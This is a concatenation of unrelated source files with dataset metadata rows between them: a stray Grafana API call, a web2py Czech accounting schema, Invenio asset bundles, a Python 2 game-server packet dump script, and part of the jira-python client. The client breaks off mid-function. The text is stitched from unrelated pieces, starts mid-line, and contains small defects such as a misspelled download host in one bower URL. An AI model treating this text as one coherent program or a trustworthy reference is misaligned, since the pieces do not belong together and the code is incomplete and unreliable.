do("PUT", connection, headers, "/api/org/preferences", {"homeDashboardId" : 1})
|
bsd-3-clause
| 7,001,299,087,362,661,000
| 26
| 88
| 0.68112
| false
| 3.629508
| false
| false
| false
|
RysavyD/platby
|
models/db_model.py
|
1
|
5519
|
# coding: utf8
import locale
from mz_wkasa_platby import fix_login, Uc_sa
# Uc_sa - id účtů účtové osnovy - při importu zde je vidí controléry i views
locale.setlocale(locale.LC_ALL, 'cs_CZ.UTF-8')
class IS_IN_DB_(IS_IN_DB):
def build_set(self):
super(IS_IN_DB_, self).build_set()
records = [(lbl, self.theset[pos]) for pos, lbl in enumerate(self.labels)]
records.sort(key=lambda x: locale.strxfrm(x[0]))
self.labels = [rec[0] for rec in records]
self.theset = [rec[1] for rec in records]
db.define_table('ucet',
Field('ucet', length=7),
Field('zkratka', length=3),
Field('nazev', length=100),
format='%(ucet)s - %(nazev)s'
)
db.define_table('kategorie',
Field('idma_dati', db.ucet),
Field('iddal', db.ucet),
Field('vyznam', default=''),
format='%(vyznam)s'
)
db.define_table('typp',
Field('zkratka', length=1),
Field('vyznam', length=40),
format='%(vyznam)s'
)
db.define_table('partner',
Field('idx', 'integer'), # foxpro id
Field('typp_id', db.typp),
Field('ucel', length=40),
Field('nazev', length=60),
Field('ulice', length=40),
Field('psc', length=5),
Field('misto', length=40),
Field('ico', length=10),
Field('kontakt', 'text'),
Field('poznamka', 'text'),
format='%(nazev)s, %(misto)s'
)
db.define_table('fp',
Field('idx', 'integer'), # foxpro id
Field('zauctovana', 'boolean', default=False),
Field('md', db.ucet, label=TFu('nákladový účet 5..'),
comment=TFu('pro zaúčtování faktury [MD=5..,Dal=321], pokud ještě nebylo provedeno')),
Field('partner_id', db.partner, ondelete='SETNULL',),
Field('ucet', length=20),
Field('elektronicky', 'boolean', default=True),
Field('castka', 'decimal(11,2)', default=0.00),
Field('zaloha', 'decimal(11,2)', default=0.00),
Field('no_jejich', length=20),
Field('vystaveno', 'date'),
Field('prijato', 'date'),
Field('splatnost', 'date'),
Field('uhrazeno', 'date'),
Field('zal_uhrazeno', 'date'),
Field('datum_akce', 'date'),
Field('uhrada', length=1),
Field('zal_uhrada', length=1),
Field('vs', length=10),
Field('ss', length=10),
Field('ks', length=4),
Field('vs_akce', length=5),
Field('popis', length=90),
Field('poznamka', 'text'),
format='%(vystaveno)s, %(castka)s, %(no_jejich)s'
)
db.define_table('pohyb',
Field('idauth_user', 'reference auth_user', label=TFu("Uživatel"),
requires=IS_EMPTY_OR(IS_IN_DB_(db, db.auth_user.id, '%(nick)s - %(vs)s'))),
Field('idorganizator', 'reference auth_user', label=TFu("Zadal organizátor"),
readable=False, writable=False,
requires=IS_EMPTY_OR(IS_IN_DB(db, db.auth_user.id, '%(nick)s - %(vs)s'))),
Field('idma_dati', 'reference ucet'),
Field('iddal', 'reference ucet'),
Field('fp_id', db.fp,
requires=IS_EMPTY_OR(IS_IN_DB(db, db.fp.id, db.fp._format)),
represent=lambda id, r=None: db.fp._format % db.fp(id) if id else '',
ondelete='SETNULL',
),
Field('partner_id', db.partner,
requires=IS_EMPTY_OR(IS_IN_DB(db, db.partner.id, db.partner._format)),
represent=lambda id, r=None: db.partner._format % db.partner(id) if id else '',
ondelete='SETNULL',
),
Field('datum', 'datetime',
requires=[IS_NOT_EMPTY(), IS_DATETIME(format=TFu('%d.%m.%Y'))]),
Field('castka', 'decimal(11,2)'),
Field('popis', 'text'),
Field('cislo_uctu', length=30),
Field('kod_banky', length=10),
Field('nazev_banky', length=40),
Field('zakaznik', length=10),
Field('vs', length=10, default=''),
Field('ss', length=10, default=''),
Field('ks', length=4, default=''),
Field('id_pohybu', length=12),
Field('id_pokynu', length=12),
)
db.define_table('systab',
Field('kod', length=12),
Field('hodnota', length=100),
)
db.define_table('loginlog',
Field('idauth_user', 'reference auth_user'),
Field('datum', 'date'),
)
db.define_table('zadost',
Field('zadost', 'datetime', label="Datum žádosti"),
Field('idauth_user', 'reference auth_user', label="Uživatel"),
Field('vyridil_id', 'reference auth_user', label="Vyřídil"),
Field('vs', length=10, label="Symbol",
comment="symbol uživatele"),
Field('ss', length=10, label="Symbol obsol",
comment=""),
Field('typ', 'integer', label='Typ žádosti',
comment='1 sa->wKasa, 2->na BÚ, 3 členství, 4 refundace'),
Field('cislo_uctu', length=30, label='Číslo účtu'),
Field('kod_banky', length=10, label='Kód banky'),
Field('popis', 'text'),
Field('prevod', 'datetime', label='Datum vyřízení'),
Field('zadano', 'decimal(11,2)', label='Žádaná částka'),
Field('prevedeno', 'decimal(11,2)', label='Převedená částka'),
)
db.define_table('clenstvi',
Field('user_id', 'reference auth_user', label="Uživatel"),
Field('group_id', 'reference auth_group', label="Role ve sdružení"),
Field('ode_dne', 'date', label="Ode dne"),
Field('do_dne', 'date', label="Do dne"),
)
fix_login(db, auth, vs_default) # každému dát osobní symbol, logovat
## after defining tables, uncomment below to enable auditing
# auth.enable_record_versioning(db)
|
agpl-3.0
| -6,709,750,360,438,365,000
| 33.940789
| 94
| 0.581549
| false
| 2.855724
| false
| false
| false
|
MSusik/invenio
|
invenio/base/bundles.py
|
1
|
2885
|
# -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2014 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Base bundles."""
from invenio.ext.assets import Bundle
invenio = Bundle(
"js/invenio.js",
output="invenio.js",
filters="requirejs",
weight=90
)
styles = Bundle(
"css/token-input.css",
"css/token-input-facebook.css",
"css/typeahead.js-bootstrap.css",
"less/base.less",
"css/tags/popover.css",
output="invenio.css",
depends=[
"less/base.less",
"less/base/**/*.less"
],
filters="less,cleancss",
)
# FIXME
#if config.CFG_WEBSTYLE_TEMPLATE_SKIN != "default":
# styles.contents.append("css/" + config.CFG_WEBSTYLE_TEMPLATE_SKIN + ".css")
jquery = Bundle(
"js/jquery.js",
"js/jquery.jeditable.mini.js",
"js/jquery.tokeninput.js",
"js/jquery-caret.js",
"js/typeahead.js",
"js/bootstrap.js",
"js/bootstrap-select.js",
"js/hogan.js",
"js/translate.js",
output="jquery.js",
filters="uglifyjs",
weight=10,
bower={
"jquery": "2.1.0",
"bootstrap": "3.2.0",
"hogan": "3.0.0",
"jquery.jeditable": "http://invenio-software.org/download/jquery/v1.5/js/jquery.jeditable.mini.js",
"jquery.tokeninput": "*"
}
)
# jQuery UI
jqueryui = Bundle(
"js/jqueryui/jquery-ui.custom.js",
"js/jquery-ui-timepicker-addon.js",
filters="uglifyjs",
output="jquery-ui.js",
weight=11,
bower={
"jqueryui": "1.11.0",
"jquery.ui.timepicker": "http://invenoi-software.org/download/jquery/jquery-ui-timepicker-addon-1.0.3.js"
}
)
# if ASSETS_DEBUG and not LESS_RUN_IN_DEBUG
lessjs = Bundle(
"js/less.js",
output="less.js",
filters="uglifyjs",
weight=0,
bower={
"less": "1.7.0"
}
)
# if ASSETS_DEBUG and not REQUIRESJS_RUN_IN_DEBUG
requirejs = Bundle(
"js/require.js",
"js/settings.js",
output="require.js",
filters="uglifyjs",
weight=0,
bower={
"requirejs": "latest"
}
)
# else
almondjs = Bundle(
"js/almond.js",
"js/settings.js",
output="almond.js",
filters="uglifyjs",
weight=0,
bower={
"almond": "latest"
}
)
|
gpl-2.0
| 4,890,553,612,865,183,000
| 23.65812
| 113
| 0.625303
| false
| 3.118919
| false
| false
| false
|
tsdfsetatata/xserver
|
Server/dump_srv/print_wanyaogu.py
|
1
|
3005
|
#!/usr/bin/python
# coding: UTF-8
import sys
from socket import *
import struct
import raid_pb2
import wanyaogu_pb2
import login_pb2
import cast_skill_pb2
import move_direct_pb2
import team_pb2
import datetime
import get_one_msg
import scene_transfer_pb2
import horse_pb2
WATCH_PLAYER = {8589935415}
HOST='127.0.0.1'
PORT=13697
PORT=get_one_msg.get_dumpsrv_port()
ADDR=(HOST, PORT)
client=socket(AF_INET, SOCK_STREAM)
client.connect(ADDR)
last_data = ""
player_list = {}
def get_buff_data(t1):
retdata = ""
for buffinfo in t1.buff_info:
tmp = "(%d) " % buffinfo.id
retdata = retdata + tmp
return retdata
while True:
ret, last_data, player_id, msg_id, pb_data = get_one_msg.get_one_msg(client, last_data)
if ret == -1:
break
if ret == 0:
continue
# data_len = data_len - 8 - 16
# msg_format = "=IHH" + str(data_len) + 'sQIHH'
# msg_len, msg_id, seq, pb_data, player_id, t1, t1, t1 = struct.unpack(msg_format, data)
# print "read msg:", msg_id
# if not player_id in WATCH_PLAYER:
# continue;
#场景切换 10112
if msg_id == 10112:
req = scene_transfer_pb2.scene_transfer_answer();
req.ParseFromString(pb_data)
oldtime=datetime.datetime.now()
print oldtime.time(), ": %lu 进入场景[%s]" % (player_id, req.new_scene_id)
#副本完成 10812
if msg_id == 10812:
req = raid_pb2.raid_finish_notify();
req.ParseFromString(pb_data)
oldtime=datetime.datetime.now()
print oldtime.time(), ": %lu 副本结算[%s]" % (player_id, req.star)
#万妖卡列表 11401
if msg_id == 11401:
req = wanyaogu_pb2.list_wanyaoka_answer()
req.ParseFromString(pb_data)
oldtime=datetime.datetime.now()
print oldtime.time(), ": %lu 万妖卡列表[%s]" % (player_id, req.wanyaoka_id)
#万妖谷关卡开始通知 11402
if msg_id == 11402:
req = wanyaogu_pb2.wanyaogu_start_notify()
req.ParseFromString(pb_data)
oldtime=datetime.datetime.now()
print oldtime.time(), ": %lu 万妖谷开始[%lu]" % (player_id, req.start_time)
#万妖谷关卡火炉挂机通知 11403
if msg_id == 11403:
oldtime=datetime.datetime.now()
print oldtime.time(), ": %lu 万妖谷火炉挂机" % (player_id)
#进入游戏对时
if msg_id == 10007:
req = login_pb2.EnterGameAnswer()
req.ParseFromString(pb_data)
oldtime=datetime.datetime.now()
print oldtime.time(), ": %lu 进入游戏 %u %d [%u %s %s]" % (player_id, req.curTime, req.direct, req.sceneId, req.posX, req.posZ)
#11404 //获得万妖卡通知 wanyaoka_get_notify
if msg_id == 11404:
req = wanyaogu_pb2.wanyaoka_get_notify()
req.ParseFromString(pb_data)
oldtime=datetime.datetime.now()
print oldtime.time(), ": %lu 获得万妖卡 %s" % (player_id, req.wanyaoka_id)
|
gpl-3.0
| 5,305,513,111,979,851,000
| 27.45
| 140
| 0.603515
| false
| 2.508818
| false
| false
| false
|
coddingtonbear/jira
|
jira/client.py
|
1
|
100626
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from __future__ import print_function
"""
This module implements a friendly (well, friendlier) interface between the raw JSON
responses from JIRA and the Resource/dict abstractions provided by this library. Users
will construct a JIRA object as described below. Full API documentation can be found
at: https://jira-python.readthedocs.org/en/latest/
"""
from functools import wraps
import imghdr
import mimetypes
import copy
import os
import re
import string
import tempfile
import logging
import json
import warnings
import pprint
import sys
try:
from collections import OrderedDict
except ImportError:
from ordereddict import OrderedDict
from six import string_types, integer_types
# six.moves does not play well with pyinstaller, see https://github.com/pycontribs/jira/issues/38
# from six.moves import html_parser
if sys.version_info < (3, 0, 0):
import HTMLParser as html_parser
else:
import html.parser as html_parser
import requests
try:
from requests_toolbelt import MultipartEncoder
except:
pass
# JIRA specific resources
from jira.resources import Resource, Issue, Comment, Project, Attachment, Component, Dashboard, Filter, Votes, Watchers, \
Worklog, IssueLink, IssueLinkType, IssueType, Priority, Version, Role, Resolution, SecurityLevel, Status, User, \
CustomFieldOption, RemoteLink
# GreenHopper specific resources
from jira.resources import GreenHopperResource, Board, Sprint
from jira.resilientsession import ResilientSession
from jira import __version__
from jira.utils import threaded_requests, json_loads, JIRAError, CaseInsensitiveDict
try:
from random import SystemRandom
random = SystemRandom()
except ImportError:
import random
# warnings.simplefilter('default')
# encoding = sys.getdefaultencoding()
# if encoding != 'UTF8':
# warnings.warn("Python default encoding is '%s' instead of 'UTF8' which means that there is a big change of having problems. Possible workaround http://stackoverflow.com/a/17628350/99834" % encoding)
def translate_resource_args(func):
"""
Decorator that converts Issue and Project resources to their keys when used as arguments.
"""
@wraps(func)
def wrapper(*args, **kwargs):
arg_list = []
for arg in args:
if isinstance(arg, (Issue, Project)):
arg_list.append(arg.key)
else:
arg_list.append(arg)
result = func(*arg_list, **kwargs)
return result
return wrapper
class ResultList(list):
def __init__(self, iterable=None, _total=None):
if iterable is not None:
list.__init__(self, iterable)
else:
list.__init__(self)
self.total = _total if _total is not None else len(self)
class JIRA(object):
"""
User interface to JIRA.
Clients interact with JIRA by constructing an instance of this object and calling its methods. For addressable
resources in JIRA -- those with "self" links -- an appropriate subclass of :py:class:`Resource` will be returned
with customized ``update()`` and ``delete()`` methods, along with attribute access to fields. This means that calls
of the form ``issue.fields.summary`` will be resolved into the proper lookups to return the JSON value at that
mapping. Methods that do not return resources will return a dict constructed from the JSON response or a scalar
value; see each method's documentation for details on what that method returns.
"""
DEFAULT_OPTIONS = {
"server": "http://localhost:2990/jira",
"rest_path": "api",
"rest_api_version": "2",
"verify": True,
"resilient": True,
"async": False,
"client_cert": None,
"check_update": True,
"headers": {
'X-Atlassian-Token': 'no-check',
'Cache-Control': 'no-cache',
# 'Accept': 'application/json;charset=UTF-8', # default for REST
'Content-Type': 'application/json', # ;charset=UTF-8',
# 'Accept': 'application/json', # default for REST
#'Pragma': 'no-cache',
#'Expires': 'Thu, 01 Jan 1970 00:00:00 GMT'
}
}
checked_version = False
JIRA_BASE_URL = '{server}/rest/api/{rest_api_version}/{path}'
AGILE_BASE_URL = '{server}/rest/greenhopper/1.0/{path}'
def __init__(self, server=None, options=None, basic_auth=None, oauth=None, validate=None, async=False,
logging=True, max_retries=3):
"""
Construct a JIRA client instance.
Without any arguments, this client will connect anonymously to the JIRA instance
started by the Atlassian Plugin SDK from one of the 'atlas-run', ``atlas-debug``,
or ``atlas-run-standalone`` commands. By default, this instance runs at
``http://localhost:2990/jira``. The ``options`` argument can be used to set the JIRA instance to use.
Authentication is handled with the ``basic_auth`` argument. If authentication is supplied (and is
accepted by JIRA), the client will remember it for subsequent requests.
For quick command line access to a server, see the ``jirashell`` script included with this distribution.
The easiest way to instantiate is using j = JIRA("https://jira.atlasian.com")
:param options: Specify the server and properties this client will use. Use a dict with any
of the following properties:
* server -- the server address and context path to use. Defaults to ``http://localhost:2990/jira``.
* rest_path -- the root REST path to use. Defaults to ``api``, where the JIRA REST resources live.
* rest_api_version -- the version of the REST resources under rest_path to use. Defaults to ``2``.
* verify -- Verify SSL certs. Defaults to ``True``.
* client_cert -- a tuple of (cert,key) for the requests library for client side SSL
:param basic_auth: A tuple of username and password to use when establishing a session via HTTP BASIC
authentication.
:param oauth: A dict of properties for OAuth authentication. The following properties are required:
* access_token -- OAuth access token for the user
* access_token_secret -- OAuth access token secret to sign with the key
* consumer_key -- key of the OAuth application link defined in JIRA
* key_cert -- private key file to sign requests with (should be the pair of the public key supplied to
JIRA in the OAuth application link)
:param validate: If true it will validate your credentials first. Remember that if you are accesing JIRA
as anononymous it will fail to instanciate.
:param async: To enable async requests for those actions where we implemented it, like issue update() or delete().
Obviously this means that you cannot rely on the return code when this is enabled.
"""
if options is None:
options = {}
if server and hasattr(server, 'keys'):
warnings.warn(
"Old API usage, use JIRA(url) or JIRA(options={'server': url}, when using dictionary always use named parameters.",
DeprecationWarning)
options = server
server = None
if server:
options['server'] = server
if async:
options['async'] = async
self.logging = logging
self._options = copy.copy(JIRA.DEFAULT_OPTIONS)
self._options.update(options)
# Rip off trailing slash since all urls depend on that
if self._options['server'].endswith('/'):
self._options['server'] = self._options['server'][:-1]
self._try_magic()
if oauth:
self._create_oauth_session(oauth)
elif basic_auth:
self._create_http_basic_session(*basic_auth)
self._session.headers.update(self._options['headers'])
else:
verify = self._options['verify']
self._session = ResilientSession()
self._session.verify = verify
self._session.headers.update(self._options['headers'])
self._session.max_retries = max_retries
if validate:
# This will raise an Exception if you are not allowed to login.
# It's better to fail faster than later.
self.session()
# We need version in order to know what API calls are available or not
si = self.server_info()
try:
self._version = tuple(si['versionNumbers'])
except Exception as e:
globals()['logging'].error("invalid server_info: %s", si)
raise e
if self._options['check_update'] and not JIRA.checked_version:
self._check_update_()
JIRA.checked_version = True
def _check_update_(self):
# check if the current version of the library is outdated
try:
data = requests.get("http://pypi.python.org/pypi/jira/json", timeout=2.001).json()
released_version = data['info']['version']
if released_version > __version__:
warnings.warn("You are running an outdated version of JIRA Python %s. Current version is %s. Do not file any bugs against older versions." % (
__version__, released_version))
except requests.RequestException:
pass
except Exception as e:
logging.warning(e)
def __del__(self):
session = getattr(self, "_session", None)
if session is not None:
if sys.version_info < (3, 4, 0): # workaround for https://github.com/kennethreitz/requests/issues/2303
session.close()
def _check_for_html_error(self, content):
# TODO: Make it return errors when content is a webpage with errors
# JIRA has the bad habbit of returning errors in pages with 200 and
# embedding the error in a huge webpage.
if '<!-- SecurityTokenMissing -->' in content:
logging.warning("Got SecurityTokenMissing")
raise JIRAError("SecurityTokenMissing: %s" % content)
return False
return True
# Information about this client
def client_info(self):
"""Get the server this client is connected to."""
return self._options['server']
# Universal resource loading
def find(self, resource_format, ids=None):
"""
Get a Resource object for any addressable resource on the server.
This method is a universal resource locator for any RESTful resource in JIRA. The
argument ``resource_format`` is a string of the form ``resource``, ``resource/{0}``,
``resource/{0}/sub``, ``resource/{0}/sub/{1}``, etc. The format placeholders will be
populated from the ``ids`` argument if present. The existing authentication session
will be used.
The return value is an untyped Resource object, which will not support specialized
:py:meth:`.Resource.update` or :py:meth:`.Resource.delete` behavior. Moreover, it will
not know to return an issue Resource if the client uses the resource issue path. For this
reason, it is intended to support resources that are not included in the standard
Atlassian REST API.
:param resource_format: the subpath to the resource string
:param ids: values to substitute in the ``resource_format`` string
:type ids: tuple or None
"""
resource = Resource(resource_format, self._options, self._session)
resource.find(ids)
return resource
def async_do(self, size=10):
"""
This will execute all async jobs and wait for them to finish. By default it will run on 10 threads.
size: number of threads to run on.
:return:
"""
if hasattr(self._session, '_async_jobs'):
logging.info("Executing async %s jobs found in queue by using %s threads..." % (
len(self._session._async_jobs), size))
threaded_requests.map(self._session._async_jobs, size=size)
# Application properties
# non-resource
def application_properties(self, key=None):
"""
Return the mutable server application properties.
:param key: the single property to return a value for
"""
params = {}
if key is not None:
params['key'] = key
return self._get_json('application-properties', params=params)
def set_application_property(self, key, value):
"""
Set the application property.
:param key: key of the property to set
:param value: value to assign to the property
"""
url = self._options['server'] + \
'/rest/api/2/application-properties/' + key
payload = {
'id': key,
'value': value
}
r = self._session.put(
url, data=json.dumps(payload))
def applicationlinks(self, cached=True):
"""
List of application links
:return: json
"""
# if cached, return the last result
if cached and hasattr(self, '_applicationlinks'):
return self._applicationlinks
#url = self._options['server'] + '/rest/applinks/latest/applicationlink'
url = self._options['server'] + \
'/rest/applinks/latest/listApplicationlinks'
r = self._session.get(url)
o = json_loads(r)
if 'list' in o:
self._applicationlinks = o['list']
else:
self._applicationlinks = []
return self._applicationlinks
# Attachments
def attachment(self, id):
"""Get an attachment Resource from the server for the specified ID."""
return self._find_for_resource(Attachment, id)
# non-resource
def attachment_meta(self):
"""Get the attachment metadata."""
return self._get_json('attachment/meta')
@translate_resource_args
def add_attachment(self, issue, attachment, filename=None):
"""
Attach an attachment to an issue and returns a Resource for it.
The client will *not* attempt to open or validate the attachment; it expects a file-like object to be ready
for its use. The user is still responsible for tidying up (e.g., closing the file, killing the socket, etc.)
:param issue: the issue to attach the attachment to
:param attachment: file-like object to attach to the issue, also works if it is a string with the filename.
:param filename: optional name for the attached file. If omitted, the file object's ``name`` attribute
is used. If you aquired the file-like object by any other method than ``open()``, make sure
that a name is specified in one way or the other.
:rtype: an Attachment Resource
"""
if isinstance(attachment, string_types):
attachment = open(attachment, "rb")
if hasattr(attachment, 'read') and hasattr(attachment, 'mode') and attachment.mode != 'rb':
logging.warning(
"%s was not opened in 'rb' mode, attaching file may fail." % attachment.name)
# TODO: Support attaching multiple files at once?
url = self._get_url('issue/' + str(issue) + '/attachments')
fname = filename
if not fname:
fname = os.path.basename(attachment.name)
if 'MultipartEncoder' not in globals():
method = 'old'
r = self._session.post(
url,
files={
'file': (fname, attachment, 'application/octet-stream')},
headers=CaseInsensitiveDict({'content-type': None, 'X-Atlassian-Token': 'nocheck'}))
else:
method = 'MultipartEncoder'
def file_stream():
return MultipartEncoder(
fields={
'file': (fname, attachment, 'text/plain')}
)
m = file_stream()
r = self._session.post(
url, data=m, headers=CaseInsensitiveDict({'content-type': m.content_type, 'X-Atlassian-Token': 'nocheck'}), retry_data=file_stream)
attachment = Attachment(self._options, self._session, json_loads(r)[0])
if attachment.size == 0:
raise JIRAError("Added empty attachment via %s method?!: r: %s\nattachment: %s" % (method, r, attachment))
return attachment
# Components
def component(self, id):
"""
Get a component Resource from the server.
:param id: ID of the component to get
"""
return self._find_for_resource(Component, id)
@translate_resource_args
def create_component(self, name, project, description=None, leadUserName=None, assigneeType=None,
isAssigneeTypeValid=False):
"""
Create a component inside a project and return a Resource for it.
:param name: name of the component
:param project: key of the project to create the component in
:param description: a description of the component
:param leadUserName: the username of the user responsible for this component
:param assigneeType: see the ComponentBean.AssigneeType class for valid values
:param isAssigneeTypeValid: boolean specifying whether the assignee type is acceptable
"""
data = {
'name': name,
'project': project,
'isAssigneeTypeValid': isAssigneeTypeValid
}
if description is not None:
data['description'] = description
if leadUserName is not None:
data['leadUserName'] = leadUserName
if assigneeType is not None:
data['assigneeType'] = assigneeType
url = self._get_url('component')
r = self._session.post(
url, data=json.dumps(data))
component = Component(self._options, self._session, raw=json_loads(r))
return component
def component_count_related_issues(self, id):
"""
Get the count of related issues for a component.
:type id: integer
:param id: ID of the component to use
"""
return self._get_json('component/' + id + '/relatedIssueCounts')['issueCount']
# Custom field options
def custom_field_option(self, id):
"""
Get a custom field option Resource from the server.
:param id: ID of the custom field to use
"""
return self._find_for_resource(CustomFieldOption, id)
# Dashboards
def dashboards(self, filter=None, startAt=0, maxResults=20):
"""
Return a ResultList of Dashboard resources and a ``total`` count.
:param filter: either "favourite" or "my", the type of dashboards to return
:param startAt: index of the first dashboard to return
:param maxResults: maximum number of dashboards to return. The total number of
results is always available in the ``total`` attribute of the returned ResultList.
"""
params = {}
if filter is not None:
params['filter'] = filter
params['startAt'] = startAt
params['maxResults'] = maxResults
r_json = self._get_json('dashboard', params=params)
dashboards = [Dashboard(self._options, self._session, raw_dash_json)
for raw_dash_json in r_json['dashboards']]
return ResultList(dashboards, r_json['total'])
def dashboard(self, id):
"""
Get a dashboard Resource from the server.
:param id: ID of the dashboard to get.
"""
return self._find_for_resource(Dashboard, id)
# Fields
# non-resource
def fields(self):
"""Return a list of all issue fields."""
return self._get_json('field')
# Filters
def filter(self, id):
"""
Get a filter Resource from the server.
:param id: ID of the filter to get.
"""
return self._find_for_resource(Filter, id)
def favourite_filters(self):
"""Get a list of filter Resources which are the favourites of the currently authenticated user."""
r_json = self._get_json('filter/favourite')
filters = [Filter(self._options, self._session, raw_filter_json)
for raw_filter_json in r_json]
return filters
def create_filter(self, name=None, description=None,
jql=None, favourite=None):
"""
Create a new filter and return a filter Resource for it.
Keyword arguments:
name -- name of the new filter
description -- useful human readable description of the new filter
jql -- query string that defines the filter
favourite -- whether to add this filter to the current user's favorites
"""
data = {}
if name is not None:
data['name'] = name
if description is not None:
data['description'] = description
if jql is not None:
data['jql'] = jql
if favourite is not None:
data['favourite'] = favourite
url = self._get_url('filter')
r = self._session.post(
url, data=json.dumps(data))
raw_filter_json = json_loads(r)
return Filter(self._options, self._session, raw=raw_filter_json)
# Groups
# non-resource
def groups(self, query=None, exclude=None, maxResults=None):
"""
Return a list of groups matching the specified criteria.
Keyword arguments:
query -- filter groups by name with this string
exclude -- filter out groups by name with this string
maxResults -- maximum results to return. defaults to system property jira.ajax.autocomplete.limit (20)
"""
params = {}
if query is not None:
params['query'] = query
if exclude is not None:
params['exclude'] = exclude
if maxResults is not None:
params['maxResults'] = maxResults
return self._get_json('groups/picker', params=params)
def group_members(self, group):
"""
Return a hash or users with their information. Requires JIRA 6.0 or will raise NotImplemented.
"""
if self._version < (6, 0, 0):
raise NotImplementedError(
"Group members is not implemented in JIRA before version 6.0, upgrade the instance, if possible.")
params = {'groupname': group, 'expand': "users"}
r = self._get_json('group', params=params)
size = r['users']['size']
end_index = r['users']['end-index']
while end_index < size - 1:
params = {'groupname': group, 'expand': "users[%s:%s]" % (
end_index + 1, end_index + 50)}
r2 = self._get_json('group', params=params)
for user in r2['users']['items']:
r['users']['items'].append(user)
end_index = r2['users']['end-index']
size = r['users']['size']
result = {}
for user in r['users']['items']:
result[user['name']] = {'fullname': user['displayName'], 'email': user['emailAddress'],
'active': user['active']}
return result
def add_group(self, groupname):
'''
Creates a new group in JIRA.
:param groupname: The name of the group you wish to create.
:return: Boolean - True if succesfull.
'''
url = self._options['server'] + '/rest/api/latest/group'
# implementation based on
# https://docs.atlassian.com/jira/REST/ondemand/#d2e5173
x = OrderedDict()
x['name'] = groupname
payload = json.dumps(x)
self._session.post(url, data=payload)
return True
def remove_group(self, groupname):
'''
Deletes a group from the JIRA instance.
:param groupname: The group to be deleted from the JIRA instance.
:return: Boolean. Returns True on success.
'''
# implementation based on
# https://docs.atlassian.com/jira/REST/ondemand/#d2e5173
url = self._options['server'] + '/rest/api/latest/group'
x = {'groupname': groupname}
self._session.delete(url, params=x)
return True
# Issues
def issue(self, id, fields=None, expand=None):
"""
Get an issue Resource from the server.
:param id: ID or key of the issue to get
:param fields: comma-separated string of issue fields to include in the results
:param expand: extra information to fetch inside each resource
"""
# this allows us to pass Issue objects to issue()
if type(id) == Issue:
return id
issue = Issue(self._options, self._session)
params = {}
if fields is not None:
params['fields'] = fields
if expand is not None:
params['expand'] = expand
issue.find(id, params=params)
return issue
def create_issue(self, fields=None, prefetch=True, **fieldargs):
"""
Create a new issue and return an issue Resource for it.
Each keyword argument (other than the predefined ones) is treated as a field name and the argument's value
is treated as the intended value for that field -- if the fields argument is used, all other keyword arguments
will be ignored.
By default, the client will immediately reload the issue Resource created by this method in order to return
a complete Issue object to the caller; this behavior can be controlled through the 'prefetch' argument.
JIRA projects may contain many different issue types. Some issue screens have different requirements for
fields in a new issue. This information is available through the 'createmeta' method. Further examples are
available here: https://developer.atlassian.com/display/JIRADEV/JIRA+REST+API+Example+-+Create+Issue
:param fields: a dict containing field names and the values to use. If present, all other keyword arguments\
will be ignored
:param prefetch: whether to reload the created issue Resource so that all of its data is present in the value\
returned from this method
"""
data = {}
if fields is not None:
data['fields'] = fields
else:
fields_dict = {}
for field in fieldargs:
fields_dict[field] = fieldargs[field]
data['fields'] = fields_dict
p = data['fields']['project']
if isinstance(p, string_types) or isinstance(p, integer_types):
data['fields']['project'] = {'id': self.project(p).id}
url = self._get_url('issue')
r = self._session.post(url, data=json.dumps(data))
raw_issue_json = json_loads(r)
if 'key' not in raw_issue_json:
raise JIRAError(r.status_code, request=r)
if prefetch:
return self.issue(raw_issue_json['key'])
else:
return Issue(self._options, self._session, raw=raw_issue_json)
def createmeta(self, projectKeys=None, projectIds=[], issuetypeIds=None, issuetypeNames=None, expand=None):
"""
Gets the metadata required to create issues, optionally filtered by projects and issue types.
:param projectKeys: keys of the projects to filter the results with. Can be a single value or a comma-delimited\
string. May be combined with projectIds.
:param projectIds: IDs of the projects to filter the results with. Can be a single value or a comma-delimited\
string. May be combined with projectKeys.
:param issuetypeIds: IDs of the issue types to filter the results with. Can be a single value or a\
comma-delimited string. May be combined with issuetypeNames.
:param issuetypeNames: Names of the issue types to filter the results with. Can be a single value or a\
comma-delimited string. May be combined with issuetypeIds.
:param expand: extra information to fetch inside each resource.
"""
params = {}
if projectKeys is not None:
params['projectKeys'] = projectKeys
if projectIds is not None:
if isinstance(projectIds, string_types):
projectIds = projectIds.split(',')
params['projectIds'] = projectIds
if issuetypeIds is not None:
params['issuetypeIds'] = issuetypeIds
if issuetypeNames is not None:
params['issuetypeNames'] = issuetypeNames
if expand is not None:
params['expand'] = expand
return self._get_json('issue/createmeta', params)
# non-resource
@translate_resource_args
def assign_issue(self, issue, assignee):
"""
Assign an issue to a user. None will set it to unassigned. -1 will set it to Automatic.
:param issue: the issue to assign
:param assignee: the user to assign the issue to
"""
url = self._options['server'] + \
'/rest/api/2/issue/' + str(issue) + '/assignee'
payload = {'name': assignee}
r = self._session.put(
url, data=json.dumps(payload))
@translate_resource_args
def comments(self, issue):
"""
Get a list of comment Resources.
:param issue: the issue to get comments from
"""
r_json = self._get_json('issue/' + str(issue) + '/comment')
comments = [Comment(self._options, self._session, raw_comment_json)
for raw_comment_json in r_json['comments']]
return comments
@translate_resource_args
def comment(self, issue, comment):
"""
Get a comment Resource from the server for the specified ID.
:param issue: ID or key of the issue to get the comment from
:param comment: ID of the comment to get
"""
return self._find_for_resource(Comment, (issue, comment))
@translate_resource_args
def add_comment(self, issue, body, visibility=None):
"""
Add a comment from the current authenticated user on the specified issue and return a Resource for it.
The issue identifier and comment body are required.
:param issue: ID or key of the issue to add the comment to
:param body: Text of the comment to add
:param visibility: a dict containing two entries: "type" and "value". "type" is 'role' (or 'group' if the JIRA\
server has configured comment visibility for groups) and 'value' is the name of the role (or group) to which\
viewing of this comment will be restricted.
"""
data = {
'body': body
}
if visibility is not None:
data['visibility'] = visibility
url = self._get_url('issue/' + str(issue) + '/comment')
r = self._session.post(
url, data=json.dumps(data))
